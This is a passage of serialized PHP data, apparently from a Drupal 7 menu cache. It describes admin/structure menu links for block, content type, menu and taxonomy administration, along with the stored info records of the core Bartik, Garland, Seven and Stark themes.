"0\";s:4:\"info\";a:19:{s:4:\"name\";s:6:\"Bartik\";s:11:\"description\";s:48:\"A flexible, recolorable theme with many regions.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:7:\"regions\";a:20:{s:6:\"header\";s:6:\"Header\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:11:\"highlighted\";s:11:\"Highlighted\";s:8:\"featured\";s:8:\"Featured\";s:7:\"content\";s:7:\"Content\";s:13:\"sidebar_first\";s:13:\"Sidebar first\";s:14:\"sidebar_second\";s:14:\"Sidebar second\";s:14:\"triptych_first\";s:14:\"Triptych first\";s:15:\"triptych_middle\";s:15:\"Triptych middle\";s:13:\"triptych_last\";s:13:\"Triptych last\";s:18:\"footer_firstcolumn\";s:19:\"Footer first column\";s:19:\"footer_secondcolumn\";s:20:\"Footer second column\";s:18:\"footer_thirdcolumn\";s:19:\"Footer third column\";s:19:\"footer_fourthcolumn\";s:20:\"Footer fourth column\";s:6:\"footer\";s:6:\"Footer\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"0\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:28:\"themes/bartik/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:3:{s:14:\"css/layout.css\";s:28:\"themes/bartik/css/layout.css\";s:13:\"css/style.css\";s:27:\"themes/bartik/css/style.css\";s:14:\"css/colors.css\";s:28:\"themes/bartik/css/colors.css\";}s:5:\"print\";a:1:{s:13:\"css/print.css\";s:27:\"themes/bartik/css/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"bartik\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:6:\"Bartik\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:137;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"137\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:34:\"admin/structure/block/list/garland\";s:11:\"router_path\";s:34:\"admin/structure/block/list/garland\";s:10:\"link_title\";s:7:\"Garland\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"137\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2159:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:27:\"themes/garland/garland.info\";s:4:\"name\";s:7:\"garland\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:7:\"Garland\";s:11:\"description\";s:111:\"A multi-column theme which can be configured to modify colors and switch between fixed and fluid width layouts.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:8:\"settings\";a:1:{s:13:\"garland_width\";s:5:\"fluid\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:29:\"themes/garland/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:2:{s:3:\"all\";a:1:{s:9:\"style.css\";s:24:\"themes/garland/style.css\";}s:5:\"print\";a:1:{s:9:\"print.css\";s:24:\"themes/garland/print.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:24:\"a:1:{i:0;s:7:\"garland\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:7:\"Garland\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:143;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"143\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/list/seven\";s:11:\"router_path\";s:32:\"admin/structure/block/list/seven\";s:10:\"link_title\";s:5:\"Seven\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"143\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:1959:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/seven/seven.info\";s:4:\"name\";s:5:\"seven\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:19:{s:4:\"name\";s:5:\"Seven\";s:11:\"description\";s:65:\"A simple one-column, tableless, fluid width administration theme.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:8:\"settings\";a:1:{s:20:\"shortcut_module_link\";s:1:\"1\";}s:7:\"regions\";a:8:{s:7:\"content\";s:7:\"Content\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:13:\"sidebar_first\";s:13:\"First sidebar\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:14:\"regions_hidden\";a:3:{i:0;s:13:\"sidebar_first\";i:1;s:8:\"page_top\";i:2;s:11:\"page_bottom\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/seven/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:6:\"screen\";a:2:{s:9:\"reset.css\";s:22:\"themes/seven/reset.css\";s:9:\"style.css\";s:22:\"themes/seven/style.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:22:\"a:1:{i:0;s:5:\"seven\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:5:\"Seven\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:144;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"144\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/list/stark\";s:11:\"router_path\";s:32:\"admin/structure/block/list/stark\";s:10:\"link_title\";s:5:\"Stark\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"144\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"_block_themes_access\";s:16:\"access_arguments\";s:2062:\"a:1:{i:0;O:8:\"stdClass\":12:{s:8:\"filename\";s:23:\"themes/stark/stark.info\";s:4:\"name\";s:5:\"stark\";s:4:\"type\";s:5:\"theme\";s:5:\"owner\";s:45:\"themes/engines/phptemplate/phptemplate.engine\";s:6:\"status\";s:1:\"0\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:2:\"-1\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:18:{s:4:\"name\";s:5:\"Stark\";s:11:\"description\";s:208:\"This theme demonstrates Drupal\'s default HTML markup and CSS styles. To learn how to build your own theme and override Drupal\'s default code, see the Theming Guide.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.34\";s:4:\"core\";s:3:\"7.x\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1416429488\";s:6:\"engine\";s:11:\"phptemplate\";s:7:\"regions\";a:12:{s:13:\"sidebar_first\";s:12:\"Left sidebar\";s:14:\"sidebar_second\";s:13:\"Right sidebar\";s:7:\"content\";s:7:\"Content\";s:6:\"header\";s:6:\"Header\";s:6:\"footer\";s:6:\"Footer\";s:11:\"highlighted\";s:11:\"Highlighted\";s:4:\"help\";s:4:\"Help\";s:8:\"page_top\";s:8:\"Page top\";s:11:\"page_bottom\";s:11:\"Page bottom\";s:14:\"dashboard_main\";s:16:\"Dashboard (main)\";s:17:\"dashboard_sidebar\";s:19:\"Dashboard (sidebar)\";s:18:\"dashboard_inactive\";s:20:\"Dashboard (inactive)\";}s:8:\"features\";a:9:{i:0;s:4:\"logo\";i:1;s:7:\"favicon\";i:2;s:4:\"name\";i:3;s:6:\"slogan\";i:4;s:17:\"node_user_picture\";i:5;s:20:\"comment_user_picture\";i:6;s:25:\"comment_user_verification\";i:7;s:9:\"main_menu\";i:8;s:14:\"secondary_menu\";}s:10:\"screenshot\";s:27:\"themes/stark/screenshot.png\";s:3:\"php\";s:5:\"5.2.4\";s:7:\"scripts\";a:0:{}s:5:\"mtime\";i:1416429488;s:15:\"overlay_regions\";a:5:{i:0;s:14:\"dashboard_main\";i:1;s:17:\"dashboard_sidebar\";i:2;s:18:\"dashboard_inactive\";i:3;s:7:\"content\";i:4;s:4:\"help\";}s:14:\"regions_hidden\";a:2:{i:0;s:8:\"page_top\";i:1;s:11:\"page_bottom\";}s:28:\"overlay_supplemental_regions\";a:1:{i:0;s:8:\"page_top\";}}s:6:\"prefix\";s:11:\"phptemplate\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:10:\"layout.css\";s:23:\"themes/stark/layout.css\";}}s:6:\"engine\";s:11:\"phptemplate\";}}\";s:13:\"page_callback\";s:19:\"block_admin_display\";s:14:\"page_arguments\";s:22:\"a:1:{i:0;s:5:\"stark\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/structure/block\";s:8:\"tab_root\";s:21:\"admin/structure/block\";s:5:\"title\";s:5:\"Stark\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:155;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"155\";s:4:\"plid\";s:2:\"30\";s:9:\"link_path\";s:32:\"admin/structure/block/manage/%/%\";s:11:\"router_path\";s:32:\"admin/structure/block/manage/%/%\";s:10:\"link_title\";s:15:\"Configure block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:175;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"175\";s:4:\"plid\";s:3:\"155\";s:9:\"link_path\";s:42:\"admin/structure/block/manage/%/%/configure\";s:11:\"router_path\";s:42:\"admin/structure/block/manage/%/%/configure\";s:10:\"link_title\";s:15:\"Configure block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:3:\"175\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:176;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"176\";s:4:\"plid\";s:3:\"155\";s:9:\"link_path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:11:\"router_path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:10:\"link_title\";s:12:\"Delete block\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"30\";s:2:\"p4\";s:3:\"155\";s:2:\"p5\";s:3:\"176\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:59:\"a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:12:\"Delete block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}}i:36;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"36\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:21:\"admin/structure/types\";s:11:\"router_path\";s:21:\"admin/structure/types\";s:10:\"link_title\";s:13:\"Content types\";s:7:\"options\";s:142:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"36\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:19:\"node_overview_types\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/structure/types\";s:5:\"title\";s:13:\"Content types\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:47;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"47\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:20:\"admin/structure/menu\";s:11:\"router_path\";s:20:\"admin/structure/menu\";s:10:\"link_title\";s:5:\"Menus\";s:7:\"options\";s:136:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"47\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:33:\"a:1:{i:0;s:15:\"administer menu\";}\";s:13:\"page_callback\";s:18:\"menu_overview_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/structure/menu\";s:5:\"title\";s:5:\"Menus\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:57;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"57\";s:4:\"plid\";s:2:\"21\";s:9:\"link_path\";s:24:\"admin/structure/taxonomy\";s:11:\"router_path\";s:24:\"admin/structure/taxonomy\";s:10:\"link_title\";s:8:\"Taxonomy\";s:7:\"options\";s:117:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:2:\"57\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer 